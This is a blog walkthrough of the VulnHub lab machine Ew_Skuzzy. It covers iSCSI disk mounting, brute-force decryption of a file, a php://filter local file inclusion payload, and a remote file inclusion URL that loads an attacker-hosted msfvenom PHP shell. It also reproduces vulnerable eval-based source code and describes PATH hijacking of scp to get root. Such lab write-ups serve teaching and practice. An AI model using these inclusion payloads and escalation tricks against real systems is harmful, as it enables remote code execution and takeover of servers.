Skip to content

Ew_Skuzzy Walktrough (VulnHub)

Hello guys, In this article.I am going to solve Very interesting Vulnerable Machine aka VM which teach me lots of things. 

Download Link : https://download.vulnhub.com/ewskuzzy/Ew_Skuzzy.ova.tgz
Target IP : 192.168.56.101
Goal : Flag

Level: Intermediate.Now lets start


 

Information Gather

Lets fire up Terminal and scan target using nmap

nmap -p- -sV 192.168.56.101

Now, Here Port 80(http) is OPen means on port 80 any website running now i m crawling entire website using dirbuster.

But Nothing Special found.

Here one more interesting port  3260 which is used by iSCSI.

What is iSCSI ?
Internet Small Computer System Interface a.k.a ISCSI .
iSCSI target is a storage resource located on an Internet Small Computer System Interface server.

By default iSCSI not installed in kali if you want to help for installation.

Visit this: https://www.youtube.com/watch?v=WnhjVs4s888

Because i m not able to find any web directory i decide to go with attacking phase.


Attacking Phase

Open Terminal and type this command.

First Start iSCSI service.

seervice iscsid start

then a discover my target.

iscsiadm - m discovery -t st -p 192.168.56.101

after all Login or mount target on own system using this command.

iscsiadm -m node --login

 

 

All Done.

Now big Question is where target mount in our system ?

in terminal type (In my case /dev/sdb )

We know our target  system is linux that’s why i suppose to target ext4.

mount -t ext4 /dev/sdb /mnt/

Now Go /mnt/ and check content.

ls /mnt/

Here i found flag1.txt , Which mean i m on ryt track Lets View our flag1 and go for next

cat /mnt/flag1.txt

Our First flag is : flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

But here not only flag present here one more file present bobsdisk.dsk

I used binwalk to check file type.

Now ww know thw bobsdisk is ext version 2 filesystem.

Now we need to mount bobsdisk in our system.

First where to mount in system lets create directory for bobsdisk.dsk

mkdir bobsdisk/

mount -t ext2 /mnt/bobsdisk.dsk  bobsdisk/

In bobsdisk Directory found two files.

One file .enc extension and other is eml , First start with eml lets cat this

cat ToAlice.eml

 

G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly.

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. 

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) :)

Cheers,

Bob.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

Here We found our second flag2 at the end of .eml file.

in this file some talk about encryption and decryption

I highlighted some information in this file u can see  on above

Now i go for ToAlice.csv.enc

I m using AES Decryptor which use brute force for Decryption.

for AES Decryptor : https://github.com/touhidshaikh/AES_Decryptor


Lets Start BruteForce . and get original .csv file.

Command:

Output:

Here view ToAlice1.csv

 

Here our Third Flag3.

Third Flag : flag3{2cce194f49c6e423967b7f72316f48c5caf46e84}

And two Hash value found and some hints in second line site and preppend site and last line URL.

let prepare URL

http://192.168.56.101/5560a1468022758dba5e92ac8f2353c0

AND

http://192.168.56.101/c2444910794e037ebd8aaf257178c90b

visit and check which is correct .

Using First URL nothing special found . Found Some Base64 encoded text but no flag.

http://192.168.56.101/5560a1468022758dba5e92ac8f2353c0

After Decoded :

George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 
Soup Nazi: NO FLAG FOR YOU

Now i visit another url.

http://192.168.56.101/c2444910794e037ebd8aaf257178c90b

Luckily Here any web application host.

Now , Searching Vulnerability in web application, I notice

http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=welcome

Here ?p= parameter is seem to be a LFI attack.

Whene i visit Feed Section on web application there is Load Feed clickable link when i click it. Its Show me show hints and in url  there is url parameter which holds a remote file.

http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt

I cut url parameter and visit replace loopback to target ip.

http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/data.txt

Output

text##
This is some example source data for my nice little feed reader. I have designed my own nice little format which will allow it to include dynamic content. Who needs consultants when it's this easy? :) 
One of the best things is this will allow me to host my feed content to display on this page on an external server! So flexible :D
##text##

##php##
print("See? This is totally dynamic, generated by PHP right in my own little tool. Hacker proof, too, because there is a secret key required!");
##php##

Here Give me some hints and tell me some about  secret key , and it say there is a secret key required

Let’s start first rfi and lfi.

I tried lot to reverse shell on my bot using rfi but not success in any attempt .

now move on LFI.

http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=php://filter/read=convert.base64-encode/resource=reader.php

Dont Remember Here reader.php ,welcome.php etc .php extention compulsory without extension nothing happen.

I knew RFI present in reader.php that why i first view source code of it . For Find what i did wrong.

 

 

Here Output:

<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
$url = $_GET['url'];
} else {
print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

// Setup some variables.
$secretok = false;
$keyneeded = true;

// Localhost as a source doesn't need to use the key.
if(preg_match("#^http://127.0.0.1#", $url)) {
$keyneeded = false;
$secretok = true;
}

// Handle the key validation when it's needed.
if($keyneeded) {
$key = $_GET['key'];
if(is_array($key)) {
die("Array trick is mitigated ;)");
}
if(isset($key) && strlen($key) == '47') {
$hashedkey = hash('sha256', $key);
$secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

// If you can use the following code for a timing attack
// then good luck :) But.. You have the source anyway, right? :)
if(strcmp($hashedkey, $secret) == 0) {
$secretok = true;
} else {
die("Sorry... Authentication failed. Key was invalid.");
}

} else {
die("Authentication invalid. You might need a key.");
}
}

// Just to make sure the above key check was passed.
if(!$secretok) {
die("Something went wrong with the authentication process");
}

// Now load the contents of the file we are reading, and parse
// the super awesomeness of its contents!
$f = file_get_contents($url);

$text = preg_split("/##text##/s", $f);

if(isset($text['1']) && strlen($text['1']) > 0) {
print($text['1']);
}

print "<br /><br />";

$php = preg_split("/##php##/s", $f);

if(isset($php['1']) && strlen($php['1']) > 0) {
eval($php['1']);
// "If Eval is the answer, you're asking the wrong question!" - SG
// It hurts me to write insecure code like this, but it is in the
// name of education, and FUN, so I'll let it slide this time.
}
}

Now our work is find 47 len string which is required for RFI. Because for local host key not required but for remote hoot it needed.

and atthe end of code.

$php = preg_split("/##php##/s", $f); //Means When i build backdoor we have to change <?php to ##php##

Dig all php file for finding flag …..

 

 

Output:

<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>

Forth Flag : flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}

Our Forth flag is 47 bytes long .. and it give me hint our ste is SHELL.

Our Secret Key : 4e44db0f1edc3c361dbf54eaf4df40352db91f8b

Lets Move on RFI Again.

Lets make php shell using msfvenom.

Changes Like this.1st line

Now set up php handler.

Lets exploit .

http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://192.168.56.1/bdoor.php&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}

Its Work and i got meterpreter session.


w
e got meterpreter.

Now nxt we have to gain root privilege.
after some enumeration i found alicebackup in /opt directory.
When i executed it show .

Its run id and scp command when its execute.
using advantage to scp command we set our scp command and set path. and take root.


Now finally i got root shell.

My last Flag5.
flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a}

This Machine is Quite Difficult . I stuck many times but now its over .

Thank you.

Published inVulnHubWalkthrough

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *